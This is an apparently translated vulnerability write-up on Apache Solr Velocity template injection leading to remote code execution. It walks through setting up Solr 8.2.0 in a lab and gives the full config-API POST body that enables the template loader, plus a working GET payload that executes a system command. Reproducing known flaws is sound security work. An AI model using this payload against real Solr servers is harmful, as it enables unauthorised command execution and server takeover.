0x01 Introduction
Solr is an enterprise-level independent search application server that can provide services to the outside world through the Web service API interface. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes; they can also make search requests through Http Get operations and get returned results in XML format.
0x02 Vulnerability Introduction
The VelocityResponseWriter component exists in Solr. An attacker can construct a specific request to modify the relevant configuration so that the VelocityResponseWriter component allows Loading the specified template causes the Velocity template to inject a remote command execution vulnerability. An attacker can use this vulnerability to directly obtain server permissions.
0x03 Scope of impact
Apache Solr 5.x - 8.2.0, config API version
exists 0x04 Environment Construction
Install the java8 environment, and then download Solr, download address:
https://www.apache.org/dyn/closer.lua /lucene/solr/8.2.0/solr-8.2.0.zip
After downloading, decompress and enter the bin directory to execute./solr start
unzip solr-8.2.0.zip
Some warning messages will appear during startup. We can eliminate them by modifying the solr.in.sh file under bin and setting SOLR_ULIMIT_CHECKS to false
vim solr.in.sh
Then start again./solr start If root startup fails, add -force after it
Visit http://ip:8983 in the browser, and the following interface appears to indicate that the installation is successful
But it is found that the core cannot be created
We first manually install it in /server/solr Create a new_core folder in the / directory, then copy the conf directory under /server/solr/configsets/_default/ to the new_core directory, and then click Create
0x05 vulnerability recurrence
After creating the Core, visit to see if the application config file can be accessed
http://ip:8983/solr/new_core/config
Apache Solr integrates the VelocityResponseWriter plug-in by default. The default value of params.resource.loader.enabled in the plug-in initialization parameter is set to false. However, the integration settings can be directly modified through a POST request, setting it to true, and then You can construct special GET requests to achieve remote code execution.
Use Burp to grab the package of this page, construct a POST request directly, and add the following data
{
"update-queryresponsewriter": {
" startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir" : "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
Next we can construct the payload to implement RCE
payload:
http:// ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='') #set($rt=$x.class.forName('java.lang .Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) # set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out .available()])$str.valueOf($chr.toChars($out.read()))#end
POC address: https://github. com/wyzxxz/Apache_Solr_RCE_via_Velocity_template
##0x06 Repair method
Update to the latest versionThe above is the detailed content of Example analysis of Apache Solr velocity template injection RCE vulnerability. For more information, please follow other related articles on the PHP Chinese website!